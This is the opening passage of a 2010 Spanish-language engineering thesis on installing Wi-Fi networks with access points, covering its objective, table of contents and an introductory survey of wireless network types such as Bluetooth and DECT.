You are on page 1of 212

INSTITUTO POLITÉCNICO NACIONAL

ESCUELA SUPERIOR DE INGENIERÍA MECÁNICA Y ELECTRICA

UNIDADAD CULHUACAN

TESINA

Seminario de Titulación:
“Las tecnologías aplicadas en redes de computadoras”
DES/ ESME-CU 5092005/09/2010

REDES WLAN CON ACCESS POINT

Que como prueba escrita de su


examen Profesional para obtener
el Título de: Ingeniero en
Comunicaciones y Electrónica

Presentan:

IVAN AHUJA TORRES.


RODRIGO ARRIAGA ROQUE.
LESLIE MEDELLÍN GÓMEZ.
ANGELICA MENDOZA SÁNCHEZ.

México D.F Diciembre 2010.


OBJETIVO

Explicar los requerimientos necesarios para instalar una red LAN inalámbrica, utilizando
WiFi el cual se basa en el estándar 802.11a, 802.11b, 802.11g y cómo funcionan este tipo
de redes, las ventajas y desventajas que tienen.

JUSTIFICACIÓN

Con frecuencia las personas que están de viaje desean utilizar sus equipos portátiles para
hacer y recibir llamadas telefónicas, faxes, correos electrónicos, navegar en la web, acceder
a archivos remotos e iniciar sesión en equipos remotos y por su puesto se desea poder hacer
esto desde cualquier punto de ubicación. Algunas universidades han instalado redes
inalámbricas en sus campus para que los estudiantes puedan consultar los archivos de la
biblioteca o simplemente puedan checar su correo electrónico.

Una red inalámbrica es fácil de mantener y es muy flexible para añadir o remover
terminales de ella, esta flexibilidad nos permite viajar libremente en nuestra vida diaria sin
la necesidad de llevar con nosotros una maraña de cables. Además permite el uso de redes
en situaciones de desastre y emergencia como desastres naturales y guerra. Por esta razón
es una opción muy efectiva en tiempos de guerra o en hospitales.

REDES WLAN CON ACCESS POINT I


Las redes inalámbricas dan mayor flexibilidad que las alámbricas. A pesar de que la
mayoría de las comunicaciones de datos se han realizado a través de redes alámbricas, el
incremento de terminales móviles como computadoras portátiles (laptop's y PDA's), entre
otros, han permitido el desarrollo de las redes inalámbricas.

Una red alámbrica requiere de planes predeterminados para llevar a cabo su instalación, en
contraste, una red inalámbrica permite la comunicación espontánea sin necesidad de planes
previos; por ejemplo si una compañía que posee un edificio antiguo que no tiene cableado
de redes y desea conectar sus computadoras en red necesitaría efectuar gastos para tender al
cableado y posiblemente sea mejor hacer algunas remodelaciones al edificio, por lo cual es
más redituable comprar el equipo necesario para instalar en ese inmueble una red
inalámbrica.

Por esta razón se darán a conocer alternativas para conocer los requerimientos necesarios
para instalar una red LAN inalámbrica, utilizando WiFi, haciendo uso de las tecnologías
existentes en cuanto al hardware y el software, así como el análisis que se debe hacer
previo a la instalación de la red, configuración de los puntos de acceso y las técnicas de
seguridad para que la red no sea vulnerable ante los posibles ataques de hackers.

REDES WLAN CON ACCESS POINT II


ÍNDICE

INTRODUCCIÓN 1

CAPÍTULO I. Evolución de las redes inalámbricas 5

1.1 Redes inalámbricas de datos 7


1.2 Tipos de redes inalámbricas 8
1.3 Redes inalámbricas de área personal 10
1.3.1 Bluetooth 11
1.3.2 DECT 13
1.3.3 Infrarrojo 14
1.4 Redes Inalámbricas de área local 17
1.4.1 WIFI 18
1.4.2 HomeRF 20
1.4.3 HiperLAN 20
1.5 Redes inalámbricas de área metropolitana 21
1.5.1 LMDS 22
1.5.2 WiMAX 23
1.6 Redes inalámbricas de área extensa 25
1.7 Diferencias tecnológicas entre las redes inalámbricas 25
1.8 La regulación 27

CAPÍTULO II. Características de las redes inalámbricas 28

2.1 Ventajas de las redes inalámbricas 29


2.2 Desventajas de las redes inalámbricas 30
2.3 Diferencias entre una red cableada y una inalámbrica 32
2.4 Configuraciones de red 33
2.4.1 Puntos de acceso 35
2.4.2 Configuración para una red extensa 36
2.5 Alcance de una red inalámbrica 37
2.6 Interferencia en una red extensa 39
2.7 Perdidas de propagación en una red extensa 40

REDES WLAN CON ACCESS POINT III


CAPÍTULO III. Características de WIFI 41

3.1 Evolución de IEEE 802 42


3.2 Redes de cable 44
3.3 Redes inalámbricas 46
3.4 Mejoras al IEEE 802.11 49
3.5 El surgimiento de WIFI 50
3.5.1 Compatibilidad entre WIFI y Ethernet 51
3.6 Definición de protocolo 52
3.7 Modelo OSI 53
3.8 Funcionamiento de WIFI 57
3.9 Las capas de IEEE 802 58
3.10 La capa física 59
3.11 Espectro expandido 60
3.11.1 FHSS 61
3.11.2 DSSS 62
3.11.3 OFDM 64
3.12 Modulación de la señal 67
3.13 Características de la modulación OFDM 68
3.14 MAC Control de acceso al medio 70
3.14.1 Evitar colisiones 71
3.15 Los servicios 73
3.16 La gestión 75
3.17 El flujo de datos 75
3.18 La estructura de la red 75

CAPÍTULO IV. Puntos de acceso inalámbricos 77

4.1 Características de los puntos de acceso 79


4.2 La radio 80
4.3 Los puertos 81
4.4 Gestión del punto de acceso 82
4.5 Adaptadores inalámbricos de red 83
4.6 Tipos de adaptadores de red 84
4.6.1 Tarjetas PCMCIA 85
4.6.1.1 Características de las tarjetas PCMCIA 85
4.6.2 Adaptadores PCI e ISA 87
4.6.2.1 Características de las tarjetas PCI e ISA 87
4.6.3 Adaptadores USB8 88
4.6.3.1 Características de los adaptadores USB 89
4.7 Adaptadores para PDA 90
4.8 Bridges 91
4.9 Software de Gestión 92

REDES WLAN CON ACCESS POINT IV


CAPÍTULO V. Instalación de una red con puntos de acceso 94

5.1 Características de una red con puntos de acceso 95


5.2 Puntos de acceso 97
5.2.1 Cobertura de los puntos de acceso 97
5.2.2 Coexistencia de puntos de acceso 99
5.2.3 Ancho de banda 100
5.3 Instalar una red de puntos de acceso 101
5.4 Análisis previo a la instalación de la red 103
5.5 Configuración de la red 106
5.5.1 Configurar el adaptador de red 108
5.5.2 Configurar el protocolo TCP/IP 110
5.6 Configurar el punto de acceso 112
5.6.1 Propiedades configurables en el punto de acceso 115
5.6.2 Selección de Canal 118
5.7 Conexión con la red local cableada e Internet 121
5.8 Interconexión de los puntos de acceso 122
5.8.1 Comprobar el funcionamiento 122
5.9 Gestión de la red 124
5.10 Medir la velocidad 125
5.11 Solución de problemas 126
5.12 Solución si la conexión es mala 128

CAPÍTULO VI. Seguridad en una red WIFI 129

6.1 Riesgos 130


6.1.1 Perdida del equipo 131
6.2 Infección por virus 132
6.3 Uso equivocado por personas autorizadas 132
6.4 uso fraudulento por personas no autorizadas 133
6.5 Las debilidades de WIFI 134
6.6 Soluciones 135
6.7 Seguridad en las redes inalámbricas 136
6.7.1 WEP1 137
6.7.2 WPA la solución actual 138
6.8 Medidas de protección 140
6.9 Descubrimiento de la clave 141
6.9.1 Ataque 1 144
6.9.2 Ataque 2 147
6.9.3 Ataque 3 148
6.9.4 Ataque 4 152
6.10 IEEE 802.1x y EAD 152
6.11 802.11i 154
6.11.1 Fase 1: Acuerdo sobre la política de seguridad 155

REDES WLAN CON ACCESS POINT V


6.11.2 Fase 2: Autenticación 802.1x 157
6.11.3 Fase 3: Jerarquía y distribución de claves 158
6.11.4 Fase 4: Confidencialidad e integridad de datos RSNA 165
6.11.5 Debilidades de WPA / WAP2 170
6.11.6 Puesta en práctica en los sistemas operativos de WPA / WPA2 175
6.12 La importancia de la clave de acceso 176
6.13 Recomendaciones de WECA 177
6.14 Comprobar la seguridad 178
6.15 La solución propietaria 179
6.16 FIREWALL 179
6.16.1 Los filtros firewall 181
6.16.2 Las reglas de filtrado 182

Conclusiones 184
Bibliografía 187
Consultas en Internet 187
Glosario 189

REDES WLAN CON ACCESS POINT VI


ÍNDICE DE IMAGENES

CAPÍTULO I. Evolución de las redes inalámbricas

Figura 1.1 Ejemplo de una red inalámbrica 7


Figura 1.2 Logotipo de Bluetooth 10
Figura 1.3 Dispositivos compatibles con Bluetooth 13
Figura 1.4 Teléfono Celular Infrarrojo 15
Figura 1.5 Red WLAN 18
Figura 1.6 Dispositivos compatibles con WiFi 19
Figura 1.7 Red inalámbrica de área metropolitana 22
Figura 1.8 Red inalámbrica WIMAX 24
Figura 1.9 Torre para WiMax 24

CAPÍTULO II. Características de las redes inalámbricas

Figura 2.1 Desplazamiento de una red inalámbrica 29


Figura 2.2 Poca seguridad de una red inalámbrica 31
Figura 2.3 Red conectada con varios dispositivos 34
Figura 2.4 Punto de acceso (Access Point) 36
Figura 2.5 Red inalámbrica de gran alcance 39

CAPÍTULO III. Características de WIFI

Figura 3.1 Capa de Enlace y Capa Física 43


Figura 3.2 Modelo OSI 57
Figura 3.3 FHSS y DSSS 63
Figura 3.4 Modulación OFDM 67

CAPÍTULO IV. Puntos de acceso inalámbricos

Figura 4.1 Distintos tipos de adaptadores de red 84


Figura 4.2 Tarjetas de Red PCMCIA 86
Figura 4.3 Adaptador de red ISA y PCI 87
Figura 4.4 Adaptadores de red USB 89
Figura 4.5 Adaptadores de red para PDA 91
Figura 4.6 Bridge inalámbrico 92

CAPÍTULO V. Instalación de una red con puntos de acceso

Figura 5.1 Access Point conectado con una red cableada 95


Figura 5.2 Red Wi-Fi con punto de acceso 96
Figura 5.3 Access Point instalado en una oficina 98
Figura 5.4 Coexistencia de los puntos de acceso 99

REDES WLAN CON ACCESS POINT VII


Figura 5.5 Instalación de Access Point en una empresa 102
Figura 5.6 Instalación de una red con Access Point después de un análisis 105
Figura 5.7 Configuración de TCP/IP 106
Figura 5.8 Asistente de Windows para configurar una red inalámbrica 108
Figura 5.9 Configuración de una tarjeta de red inalámbrica 109
Figura 5.10 Configuración de protocolo TCP/IP en Windows Vista 111
Figura 5.11 Propiedades de configuración de un Access Point 116
Figura 5.12 Distribución de canales en células hexagonales 119
Figura 5.13 Distribución de canales en células cuadradas 119
Figura 5.14 Utilidades de Windows XP para monitoreo WiFi 123
Figura 5.15 Utilidad de Windows para medir la velocidad 125

CAPÍTULO VI. Seguridad en una red WIFI

Figura 6.1 Creación de un mensaje cifrado a partir del mensaje abierto 137
Figura 6.2 Protocolo de Encriptación WEP 142
Figura 6.3. Resultados de Aircrack 147
Figura 6.4 Modelo de IEEE 802.1X según la especificación IEEE 802.1X 154
Figura 6.5 Fases operacionales de 802.11i 156
Figura 6.6 Fase 1: Acuerdo sobre la política de seguridad 157
Figura 6.7 Fase 2: Autenticación 802.1X 158
Figura 6.8 Fase 3: Derivación y distribución de claves 159
Figura 6.9 Fase 3: Jerarquía de clave por parejas 161
Figura 6.10 Fase 3: 4-Way Handshake 162
Figura 6.11 Fase 3: Jerarquía de Group Key 163
Figura 6.12 Fase 3: Group Key Handshake 164
Figura 6.13 Esquema y Encriptación de TKIP Key-Mixing 167
Figura 6.14 Computación de MIC utilizando el algoritmo Michael 168
Figura 6.15. Encriptación CCMP 169
Figura 6.16 Una PSK WPA débil ha sido encontrada con Aircrack 173
Figura 6.17.Soporte de WPA2 en Windows XP SP2 176
Figura 6.18 Diagrama de Firewall
180
ÍNDICE DE TABLAS
Tabla 1.1 Tipo de Redes Inalámbricas 10
Tabla 1.2 Nivel de adaptación de las distintas tecnologías de redes locales inalámbricas 26
Tabla 2.1 Relación entre distancia y velocidad con las tarjetas WiFi 37
Tabla 3.1 Grupos de trabajo del Comité de Normalización IEEE 802 45
Tabla 3.2 a) Grupos de trabajo y de estudio relacionados con el IEEE 802.1 47
Tabla 3.2 b) Grupos de trabajo y de estudio relacionados con el IEEE 802.1 48
Tabla 5.1. Ejemplos de URL y clave para acceder a distintos puntos de Acceso 114
Tabla 5.2. Regulación de canales y frecuencias en distintos países 121

REDES WLAN CON ACCESS POINT VIII


INTRODUCCIÓN

El despegue de las redes WiFi comenzó en el año 2003, y ha sido en estos últimos años que
se ha confirmado la gran aceptación que tiene. La gran mayoría de consultoras de
tecnología coinciden en señalar que el desarrollo de las tecnologías WiFi será una de las
principales tendencias. Hace unos años, la compra de equipos con posibilidad de conexión
mediante WiFi era algo raro o en algunos casos opcional, con un considerable incremento
de precio.

Este año, sin embargo, raro es el dispositivo que no dispone de conexión inalámbrica, ya
sea mediante WiFi u otro tipo de tecnología como Bluetooh. Los proveedores de acceso a
Internet ofrecen sus modalidades con acceso WiFi para que podamos navegar desde
cualquier lugar.

Un área de aplicación totalmente diferente para las redes inalámbricas es la fusión esperada
de teléfonos celulares y PDAs en computadoras inalámbricas diminutas. Un primer intento
fue el de los PDAs que podían desplegar páginas web reducidas al mínimo en sus realmente
pequeñas pantallas.

Demostrado está que la revolución de la movilidad es indiscutible. La necesidad de estar


atados deja de existir para tener absoluta libertad gracias, por un lado, a una mayor
duración de las baterías necesarias para hacer funcionar los dispositivos portátiles y a la
posibilidad de estar conectados a cualquier red sin utilizar un solo cable.

REDES WLAN CON ACCESS POINT 1


La revolución WiFi es sinónimo de comodidad, ya que su llegada no descubre nada nuevo,
sino que mejora lo que ya hay de una forma sustancial; sustituye un medio físico, el cable,
por otro, el aire. Y aunque si bien es cierto que las mejoras son considerables, no debemos
olvidar el tema de la seguridad.

WiFi FUERA LOS CABLES

Ya no resulta extraño encontrarse con alguien sentado en un parque o en una cafetería


utilizando una computadora portátil y que pueda estar trabajando y es muy probable que
esté revisando su correo electrónico, hablando con un compañero de trabajo o amigo a
través del Messenger, o enviando a imprimir un documento a la impresora de su oficina o
su casa.

La proliferación de las redes inalámbricas, también conocidas como WiFi o WLAN


(Wireless Local Área Network), son las protagonistas de estas situaciones. Las iniciales
WiFi definen la tecnología, asociada a una serie de protocolos, que permiten la creación de
redes de trabajo sin cables. La definición de estos protocolos está supervisada por la WiFi
Alliance, una asociación que reúne a 130 miembros entre fabricantes de hardware y
software, y que asigna la marca WiFi Certified a aquellos dispositivos que pasan las
pruebas y que les hacen ser totalmente válidos para funcionar en un entorno WiFi.

Aplicaciones de las redes WLAN.

WiFi aparece como una disrupción tecnológica que, de pronto, abre expectativas en
diferentes áreas de aplicación. Dispositivos WLAN existen desde hace una década pero, en
los últimos años, WiFi adquiere una gran importancia gracias a un conjunto de claves que
están impulsando su desarrollo.

REDES WLAN CON ACCESS POINT 2


Claves de desarrollo de WiFi

• WECA garantiza la compatibilidad entre equipos de diferentes fabricantes. Anteriormente


los dispositivos de diferentes fabricantes presentaban problemas a la hora de su
Interoperación, lo que hacía que las redes se construyesen en base a soluciones mono-
fabricantes que limitaban su uso.

• Los precios de este tipo de equipamientos se han reducido drásticamente, siendo en


muchos casos la solución WLAN más interesante que una solución "wired". En edificios
con alto valor histórico, sin infraestructura de Red cableada o donde la movilidad es un
valor añadido, la solución WLAN es mejor que una solución cableada.

• Fabricantes de computadoras y PDAs comienzan a incluir de serie WiFi, "WiFi in side".


Esto hace que WiFi aparezca como una buena alternativa para la interconexión
de dispositivos. Fabricantes de la talla de INTEL están incorporando "de serie" esta
tecnología, por lo que existen en el mercado dispositivos que tienen integrado WiFi.

• Dispositivos de comunicaciones móviles comienzan a incluir WiFi de serie, lo que abre una
gran incógnita respecto al desarrollo que el WiFi puede llegar a alcanzar. Si los teléfonos
móviles llegan a utilizar WiFi para las conexiones en banda ancha, las previsiones de
desarrollo del uso del WiFi pueden verse sobrepasadas en gran medida.

• El hecho de utilizar una banda de frecuencias considerada "libre", ha abierto expectativas


en el uso del WiFi como un método de desarrollar servicios de acceso a Internet en lugares
Públicos.

REDES WLAN CON ACCESS POINT 3


El capítulo uno, da una reseña de lo que son las redes inalámbricas, se hace mención de los
tipos de redes inalámbricas que existen, así como las tecnologías que actualmente existen
para poder instalar una red WiFi inalámbrica.

El capítulo dos, hace mención de las ventajas y desventajas de instalar una red inalámbrica
WIFI en vez de una red alámbrica, así como los modos o tipos de configuración de red
inalámbrica WIFI que son dos; modo independiente y modo infraestructura.

El capítulo tres, examina el funcionamiento de la tecnología WiFi; se describe a detalle


cómo es que trabaja WiFi.

El capítulo cuatro, aborda el tema de los Access Point y tarjetas adaptadoras de red que se
utilizan para poder montar una red inalámbrica WiFi, tanto modo independiente como
modo infraestructura.

El capítulo cinco, se dedica a explicar la instalación de una red inalámbrica WiFi con
Access Point, explica que pasos se deben seguir para instalar la red, el hardware necesario y
como se debe administrar la red.

El capítulo seis, presenta la importancia que tiene la seguridad en las redes WiFi, las
precauciones que se deben tomar para que la red sea lo más segura posible haciendo uso de
los recursos que el mismo hardware proporciona mediante su software de gestión.

REDES WLAN CON ACCESS POINT 4


CAPÍTULO I
EVOLUCIÓN DE LAS REDES INALÁMBRICAS

INTRODUCCIÓN:

Llamamos comunicación inalámbrica a aquélla que se lleva a cabo sin el uso de cables de
interconexión entre los participantes; por ejemplo, una comunicación con teléfono móvil es
inalámbrica, mientras que una comunicación con teléfono fijo tradicional no lo es.

La comunicación inalámbrica digital no es una idea nueva. A principios de 1901, el físico


italiano Guillermo Marconi demostró un telégrafo inalámbrico desde un barco a tierra
utilizando el código Morse (después de todo, los puntos y rayas son binarios). Los sistemas
inalámbricos digitales de la actualidad tienen un mejor desempeño, pera la idea básica es la
misma.

Las tecnologías de interconexión inalámbrica van desde redes de voz y datos globales, que
permiten a los usuarios establecer conexiones inalámbricas a través de largas distancias,
hasta las tecnologías de luz infrarroja y radiofrecuencia que están optimizadas para
conexiones inalámbricas a distancias cortas. Entre los dispositivos comúnmente utilizados
para la interconexión inalámbrica se encuentran los equipos portátiles, equipos de
escritorio, asistentes digitales personales (PDA), teléfonos celulares, equipos con lápiz y
localizadores.

REDES WLAN CON ACCESS POINT 5


Las tecnologías inalámbricas tienen muchos usos prácticos. Por ejemplo, los usuarios de
móviles pueden usar su teléfono celular para tener acceso al correo electrónico. Las
personas que viajan con equipos portátiles pueden conectarse a Internet a través de
estaciones base instaladas en aeropuertos, estaciones de ferrocarril y otros lugares públicos.
En casa, los usuarios pueden conectar dispositivos a su equipo de escritorio para sincronizar
datos y transferir archivos.

De una forma callada, las redes inalámbricas o Wireless Networks (WN), se están
introduciendo en el mercado de consumo gracias a unos precios populares y a un conjunto
de entusiastas, mayoritariamente particulares, que han visto las enormes posibilidades de
esta tecnología. Las aplicaciones de las redes inalámbricas son infinitas. De momento van a
crear una nueva forma de usar la información, pues ésta estará al alcance de todos a través
de Internet en cualquier lugar (en el que haya cobertura).

En un futuro cercano se reunificarán todos aquellos dispositivos con los que hoy contamos
para dar paso a unos nuevos que perfectamente podrían llamarse Terminales Internet en los
cuales estarían reunidas las funciones de teléfono móvil, agenda, terminal de vídeo,
reproductor multimedia, computadora portátil etcétera. Se podría dar lugar a una Internet
paralela y gratuita la cual estaría basada en las redes que altruistamente cada uno de
nosotros pondríamos a disposición de los demás al incorporarnos a las mismas como
destino y origen de la información.

En las grandes ciudades por fin se podría llevar a cabo un control definitivo del tráfico con
el fin de evitar atascos, limitando la velocidad máxima y/o indicando rutas alternativas en
tiempo real. Las tecnologías que son necesarias para llevar a cabo estos sistemas hoy
existen desde ayer, su precio es mínimo o al menos muy accesible y su existencia mañana
sólo depende de las estrategias comerciales de las empresas que las poseen.

REDES WLAN CON ACCESS POINT 6


La conexión de computadoras mediante Ondas de Radio o Luz Infrarroja, actualmente está
siendo ampliamente investigada. Las Redes Inalámbricas facilitan la operación en lugares
donde la computadora no puede permanecer en un solo lugar, como en almacenes o en
oficinas que se encuentren en varios pisos. Sin embargo se pueden mezclar las redes
cableadas y las inalámbricas, y de esta manera generar una "Red Híbrida" y poder resolver
los últimos metros hacia la estación. Se puede considerar que el sistema cableado sea la
parte principal y la inalámbrica le proporcione movilidad adicional al equipo y el operador
se pueda desplazar con facilidad dentro de un almacén o una oficina.

1.1 REDES INALÁMBRICAS.

Una red inalámbrica de datos no es más que un conjunto de computadoras, o de cualquier


otro dispositivo informático, comunicados entre sí mediante soluciones que no requieran el
uso de cables de interconexión. Para disponer de una red inalámbrica, sólo hace falta
instalar una tarjeta de red inalámbrica en las computadoras involucradas, hacer una pequeña
configuración y listo. Esto quiere decir que instalar una red inalámbrica es un proceso
mucho más rápido y flexible que instalar una red cableada. Piense lo que supone no tener
que instalar cables por los suelos y paredes deja oficina o la casa. Además, las redes
inalámbricas permiten a sus usuarios moverse libremente sin perder la comunicación como
se muestra en la Figura 1.1.

Figura 1.1 Ejemplo de una red inalámbrica.

REDES WLAN CON ACCESS POINT 7


Una vez instalada la red inalámbrica, su utilización es prácticamente idéntica a la de una
red cableada. Las computadoras que forman parte de la red pueden comunicarse entre sí y
compartir toda clase de recursos. Se pueden compartir archivos, directorios, impresoras,
unidades de disco; incluso el acceso a otras redes, como puede ser Internet.

Para el usuario, en general, no hay diferencia entre estar conectado a una red cableada o a
una red inalámbrica. De la misma forma, al igual que ocurre con las redes cableadas, una
red inalámbrica puede estar formada por tan sólo dos computadoras o por miles de ellas.

Por todo lo anterior, las soluciones inalámbricas están cada día ocupando un lugar más
destacado dentro del panorama de las posibilidades que tienen dos equipos informáticos de
intercomunicarse. No obstante, hoy por hoy, las soluciones inalámbricas tienen también
algunos inconvenientes: tienen un menor ancho de banda (velocidad de transmisión) y, en
general, son más caras que las soluciones con cable.

El ancho de banda de las soluciones inalámbricas actuales se encuentra entre los 11y los 54
Mbps (aunque ya existen algunas soluciones propietarias a 100 Mbps), mientras que las
redes de cable alcanzan los 100 Mbps). En cuanto al precio, aunque, en general, son algo
más caras, en muchas ocasiones resultan no sólo más baratas que su alternativa cableada,
sino que se muestran como la solución más conveniente.

1.2 TIPOS DE REDES INALÁMBRICAS.

Las comunicaciones inalámbricas pueden clasificarse de distintas formas dependiendo del


criterio al que se atienda. En este caso, vamos a clasificar los sistemas de comunicaciones
inalámbricos de acuerdo con su alcance. Se llama alcance a la distancia máxima a la que
pueden situarse las dos partes de la comunicación inalámbrica. Podemos dividir a las redes
inalámbricas en los siguientes grupos de acuerdo con su alcance:

REDES WLAN CON ACCESS POINT 8


• Las redes inalámbricas de área personal o WPAN (Wireless Personal Área
Network) cubren distancias inferiores a los 10 metros. Esta solución es está pensada
para interconectar los distintos dispositivos de un usuario (por ejemplo, la
computadora con la impresora). Éste es el caso de la tecnología Bluetooth o de
IEEE 802.15.

• Las redes inalámbricas de área local o WLAN (Wireless Local Área Network)
cubren distancias de unos cientos de metros. Estas redes están pensadas para crear
un entorno de red local entre computadoras o terminales situadas en un mismo
edificio o grupo de edificios. Éste es el caso de WiFi o HomeRF.

• Las redes inalámbricas de área metropolitana o WMAN (Wireless


Metropolitan Área Network) pretenden cubrir el área de una ciudad o entorno
metropolitano. Los protocolos LMDS (Local Multipoint Distribution Service,
‘Servicio Local de Distribución Multipunto’) o WiMAX (Worldwide
Interoperability for Microwave Access, Interoperatividad mundial para accesos
de microondas) ofrecen soluciones de este tipo.

• Por último, tenemos las redes globales o de área amplia WWAN con posibilidad de
cubrir toda una región (país, grupo de países o continente). Estas redes se basan en
la tecnología celular y han aparecido como evolución de las redes de
comunicaciones de voz. Éste es el caso de las redes de telefonía móvil conocidas
como 2.5G o 3G. En comunicaciones móviles de voz se les llama 1G (primera
generación) a los sistemas analógicos (tipo NMT o AMPS), 2G a los digitales (tipo
GSM o COMA), 2.5G a los digitales con soporte para datos a alta velocidad (tipo
GPRS, IS-95B o EDGE, Enhanced Datafor GSM Evolution) y 3G o tercera
generación a los nuevos sistemas de telefonía celular con capacidad de gran ancho
de banda. Este último es el caso de UMTS o CDMA-2000, como se muestra en la
Tabla 1.1.

REDES WLAN CON ACCESS POINT 9


Tabla 1.1 Tipo de Redes Inalámbricas.

WPAN WLAN WMAN WWAN


Hasta 10m Edificio Campus Ciudad País Continente
Bluetooth WiFi LMDS 2.5 G
802.15 Home RF MMDS 3G
IrDA HiperLAN WiMAX

1.3 REDES INALÁMBRICAS DE ÁREA PERSONAL.

Las tecnologías WPAN (Wireless Personal Área Network) permiten a los usuarios
establecer comunicaciones inalámbricas ad hoc para dispositivos (como PDA, teléfonos
celulares y equipos portátiles) que se utilizan dentro de un espacio operativo personal
(POS). Un POS es el espacio que rodea a una persona, hasta una distancia de 10 metros.
Actualmente, las dos tecnologías WPAN principales son Bluetooth y la luz infrarroja.
Bluetooth es una tecnología de sustitución de cables que utiliza ondas de radio para
transmitir datos a una distancia de hasta 10 metros. Los datos de Bluetooth se pueden
transferir a través de paredes, bolsillos y maletines. El desarrollo de la tecnología de
Bluetooth lo dirige el Grupo de interés general (SIG) de Bluetooth, que publicó la
especificación de la versión 1.0 de Bluetooth en 1999.

Para normalizar el desarrollo de tecnologías WPAN, el IEEE ha establecido el grupo de


trabajo 802.15 para las WPAN. Este grupo de trabajo está desarrollando una norma
WPAN, basada en la especificación de la versión 1.0 de Bluetooth. Los objetivos
principales en esta norma preliminar son baja complejidad, bajo consumo de energía,
interoperabilidad y coexistencia con redes de 802.11. Hoy en día se dispone de una
variedad de dispositivos personales: la computadora el teléfono móvil y recientemente, el
PDA. Tradicionalmente, la comunicación de estos dispositivos con sus periféricos se ha
hecho utilizando el cable.

REDES WLAN CON ACCESS POINT 10


No obstante, tener pequeños dispositivos repletos de cables alrededor no resulta muy
cómodo, por lo que la comunicación inalámbrica supone un gran avance en cuanto a
versatilidad y comodidad. Impresoras, auriculares, módem, escáner, micrófonos, teclados,
todos estos dispositivos pueden intercomunicarse con su terminal vía radio evitando tener
que conectar cables para cada uno de ellos.

1.3.1 BLUETOOTH

En 1994, la empresa Ericsson se intereso en conectar sus teléfonos móviles y otros


dispositivos sin necesidad de cables. En conjunto con otras cuatro empresas (IBM, Intel,
Nokia y Toshiba), formo un SIG (grupo de interés especial, es decir un consorcio) con la
finalidad de crear un estándar inalámbrico para interconectar computadoras, dispositivos de
comunicaciones y accesorios a través de radios inalámbricos de de bajo consumo de
energía, corto alcance y económicos.

A este proyecto se le asigno el nombre de Bluetooth, en honor a Harald Blaatand rey


vikingo, conocido por los ingleses como Bluetooth, que reinó en Dinamarca y Noruega en
la segunda mitad del siglo X y fue uno de los hombres más poderosos de Europa. Aunque
la idea original era solo prescindir de cables entre dispositivos, su alcance se expandió
rápidamente al área de las LANs inalámbricas. A pesar que esta expansión le dio más
utilidad al estándar, también provocó el surgimiento de competencia con el 802.11.

Sin desanimarse por esto el SIG de Bluetooth emitió en julio de 1999 una especificación de
1500 páginas acerca de la versión V1.0, Un poco después, el grupo de estándares del IEEE
que se encarga de las redes de área personal inalámbricas, 802.15 adopto como base este
documento sobre Bluetooth y empezó a trabajar en el. La especificación de Bluetooth está
dirigida a un sistema completo, de la capa física a la capa de aplicación. El comité 802.15
del IEEE estandariza solamente las capas física y la de enlace de datos; el resto de la pila de
protocolos está fuera de sus estatutos.

REDES WLAN CON ACCESS POINT 11


Aun cuando el IEEE aprobó en el 2002 el primer estándar para redes de área personal
802.15.1, el SIG de Bluetooth continúa las mejoras. A pesar de que las versiones del SIG y
del IEEE difieren, se espera que en breve coincidan en un solo estándar. La unidad básica
de un sistema Bluetooth es una piconet, que consta de un nodo maestro y hasta siete nodos
esclavos activos a una distancia de 10 metros. Pueden conectarse varias piconets mediante
un nodo puente; un conjunto de piconets interconectadas se denomina scatternet.

Además de los siete nodos esclavos activos de una piconet, puede haber hasta 255 nodos
estacionados en la red; sólo siete comunicaciones pueden permanecer activas
simultáneamente. Todas las comunicaciones se realizan entre el maestro y el esclavo; no
existe comunicación directa de esclavo a esclavo, una piconet es un sistema TDM
centralizado, en el cual el maestro controla el reloj y determina que dispositivo se comunica
en un momento determinado, los esclavos son sumamente pasivos y realizan todo lo que los
maestros les indican, a continuación se muestra el logotipo de Bluetooth en la Figura 1.2.
.

Figura 1.2 Logotipo de Bluetooth.

Bluetooth utiliza la técnica FHSS (Frequency Hopping Spread Spectrum, ‘Espectro


Expandido por Salto de Frecuencia’) en la banda de frecuencias de 2.4 GHz. Puede
establecer comunicaciones asimétricas donde la velocidad máxima en una dirección es de
721 Kbps y 57.6 Kbps en la otra o comunicaciones simétricas de 432.6 Kbps en ambas
direcciones. Por otro lado, puede transmitir tanto voz como datos.

Actualmente se está definiendo la versión 2.0 de Bluetooth. Esta versión seguirá trabajando
en alcances de 10 metros y se espera que llegue a velocidades de transmisión de hasta 12
Mbps. A pesar de la aparente complementariedad de bluetooth con WiFi, lo cierto es que
esta última tecnología está evolucionando mucho más rápidamente que la primera.

REDES WLAN CON ACCESS POINT 12


Teniendo en cuenta que WiFi tiene un ancho de banda mucho mayor que Bluetooth, que
goza de un alcance bastante mayor y que poco a poco está consiguiendo equipararse en
precios, existe una cierta incertidumbre en cuanto al futuro de Bluetooth, a continuación se
muestran los dispositivos compatibles con Bluetooth en la Figura 1.3.

Figura 1.3 Dispositivos compatibles con Bluetooth.

1.3.2 DECT

El estándar DECT (Digital Enhanced Cordless Telecommunications, ‘Telecomunicaciones


Digitales Inalámbricas Mejoradas’) existe desde 1992 promulgado por ETSI (European
Telecommunications Standards Institute, ‘Instituto Europeo de Normalización en
Telecomunicaciones’). El objetivo de DECT es facilitar las comunicaciones inalámbricas
entre terminales telefónicas (teléfonos inalámbricos y centrales inalámbricas).

REDES WLAN CON ACCESS POINT 13


DECT trabaja en la banda de frecuencias de 1.9 GHz y utiliza la técnica TDMA (Time
División Múltiple Access, ‘Acceso Múltiple por División del Tiempo’). La velocidad
máxima actual a la que trabaja DECT es de 2 Mbps, aunque existe una propuesta de ETSI
para aumentar esta velocidad hasta los 20 Mbps y conseguir alcances de hasta 17
kilómetros.

A pesar de que, técnicamente, DECT podría ser un competidor de Bluetooth o, incluso, de


otros sistemas inalámbricos de mayor alcance, el hecho de que trabaje en la banda de 1.9
GHz (utilizada en Europa para esta tecnología pero con barreras regulatorias en
Norteamérica y otras partes del mundo) y que esté muy orientada a voz le pone grandes
limitaciones para competir con esas otras tecnologías.

En la idea de potenciar la tecnología DECT, en 1999 se creó en Barcelona la asociación


DECT MMC (DECT Multimedia Consortium, ‘Consorcio DECT Multimedia’, formada por
empresas como Canon, Ericsson o Ascom, con el objetivo de potenciar el uso del protocolo
DMAP (DECT Multimedia Access Profile, ‘Perfil de Acceso DECT Multimedia’) que
permite la transmisión de datos entre dispositivos a corta y media distancia.

1.3.3 INFRARROJO

La luz infrarroja es un tipo de radiación electromagnética invisible para el ojo humano. Los
sistemas de comunicaciones con infrarrojo se basan en la emisión y recepción de haces de
